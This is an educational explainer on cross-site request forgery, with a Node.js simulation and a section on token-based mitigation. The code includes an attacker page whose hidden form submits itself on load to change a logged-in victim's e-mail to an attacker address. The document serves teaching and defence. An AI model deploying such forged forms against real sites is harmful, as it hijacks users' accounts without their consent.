Cross-Site Request Forgery (CSRF/XSRF)


Cross-site request forgery (CSRF/XSRF) is an attack in which a page controlled by the attacker makes the victim’s browser send a request to another site where the victim already has an authenticated session, so the request arrives carrying the victim’s credentials (typically the session cookie) even though the victim never intended it.

  • aka confused deputy attack
    • the target site treats the browser as a stand-in for the user, but the user and the user’s browser are not the same thing: the browser will send requests the user never asked for
  • can exploit applications that use cookies to authenticate users and track sessions
  • manipulates a logged-on user’s browser into sending a forged HTTP request; the browser attaches the session cookie and other ambient auth info automatically, so the target cannot tell the forged request from a genuine one

How it Works

  • the victim must already be logged in to the target site (have a live session) when the attack happens
  • attacker then must get the victim’s browser to issue an HTTP request that performs an action on the target site
    • e.g., changing a password or an email address
  • the request can be disguised in a number of ways, so the victim does not necessarily have to click a link
    • e.g., as an image tag, a hidden form submitted automatically by script, or a link in an HTML email
  • target site will accept the request as genuine if:
    • it assumes that the browser is authenticated
      • i.e., there is a valid session cookie
    • and doesn’t perform any additional authorization on the attacker’s input
      • or if the attacker is able to spoof the authorization

  • if attacker knows a website has already authenticated a user,
    • attacker can embed an image tag in a web page or HTML-based email whose source URL is the target site’s action URL (or a URL on a site the attacker controls that redirects there)
    • when the browser fetches the “image”, it sends that request to the target with the victim’s session cookie attached, and the action is executed
    • an image tag only produces a GET request, so this variant works when the target changes state on GET; for POST-only actions the attacker uses a hidden form that submits itself on page load

Example
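The attack described above, as an added example that is not part of the original notes. It models a cookie-authenticated “change e-mail” endpoint, the attacker’s page, and the one browser behaviour the attack depends on: cookies belong to the destination site, so the target’s session cookie is attached no matter which page initiated the request. The handler name, the session store contents and the origins target.example and attacker.example are assumptions made for this illustration.

```javascript
// Added example (not from the original notes): a minimal model of a cookie-authenticated
// "change e-mail" endpoint and of a browser that attaches the target site's cookies to a
// request no matter which page caused it. The handler name, the session store contents and
// the origins (target.example, attacker.example) are assumptions made for this illustration.

// Server-side session store: session id -> account state (constructed sample data).
const sessions = new Map([
  ['s3ss10n-victim', { user: 'alice', email: 'alice@example.com' }],
]);

// Parse a Cookie request header ("a=1; b=2") into a name -> value object.
function parseCookies(header = '') {
  return Object.fromEntries(
    header.split(';').map(p => p.trim()).filter(Boolean).map(p => {
      const i = p.indexOf('=');
      return [p.slice(0, i), p.slice(i + 1)];
    })
  );
}

// Vulnerable target handler: authenticates by session cookie alone and trusts whatever
// parameters arrived with the cookie. It never asks who built the request.
function vulnerableChangeEmail(req) {
  const session = sessions.get(parseCookies(req.headers.cookie).sid);
  if (!session) return { status: 401, body: 'not logged in' };
  if (req.method !== 'POST') return { status: 405, body: 'use POST' };
  session.email = req.body.email; // state change, no proof the user intended it
  return { status: 200, body: `email changed to ${session.email}` };
}

// The attacker's page: a form aimed at the target, submitted by script as soon as the page
// loads. The victim only has to open the page; no click is required.
function attackerPage(targetOrigin, newEmail) {
  return `<html><body onload="document.forms[0].submit()">
  <form method="POST" action="${targetOrigin}/change-email">
    <input type="hidden" name="email" value="${newEmail}">
  </form>
</body></html>`;
}

// Model of the browser: cookies belong to the destination site, so the target's session
// cookie is attached even though attacker.example initiated the request.
function browserSubmit(cookieJar, initiatorOrigin, targetOrigin, body) {
  const cookie = Object.entries(cookieJar[targetOrigin] || {})
    .map(([k, v]) => `${k}=${v}`).join('; ');
  const req = { method: 'POST', headers: { cookie, origin: initiatorOrigin }, body };
  return vulnerableChangeEmail(req); // the target sees a well-formed, authenticated request
}

// Worked run: alice is logged in to target.example and then opens attacker.example.
function demo() {
  const jar = { 'https://target.example': { sid: 's3ss10n-victim' } };
  const res = browserSubmit(jar, 'https://attacker.example', 'https://target.example',
                            { email: 'attacker@evil.example' });
  return { status: res.status, email: sessions.get('s3ss10n-victim').email };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(attackerPage('https://target.example', 'attacker@evil.example'));
  console.log(demo()); // { status: 200, email: 'attacker@evil.example' }
}
```

Run it with node. The forged request succeeds with status 200 and the stored address changes, while the same request without the cookie jar entry is rejected with 401: the only thing the vulnerable handler ever checked was the cookie, and the browser supplied it.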

Mitigation

  • is difficult because forged requests are hard to tell apart from legitimate ones
    • they look the same as requests made by a user of the web application performing normal actions within it: same URL, same parameters, same session cookie
  • require user-specific tokens in all state-changing form submissions
    • when a web app generates a link or form that enables a user to submit a request
    • the application should include a hidden input parameter with a common name such as XSRFToken
    • value of this token must be generated with a cryptographically secure random number generator so that an attacker cannot guess it, bound to the user’s session, and verified server-side on every state-changing request
    • an attacker’s page cannot read the token because the same-origin policy stops it from reading the target site’s responses
    • if the token can be guessed
      • then either the algorithm or the implementation is flawed
      • leaving the web app vulnerable to XSRF attacks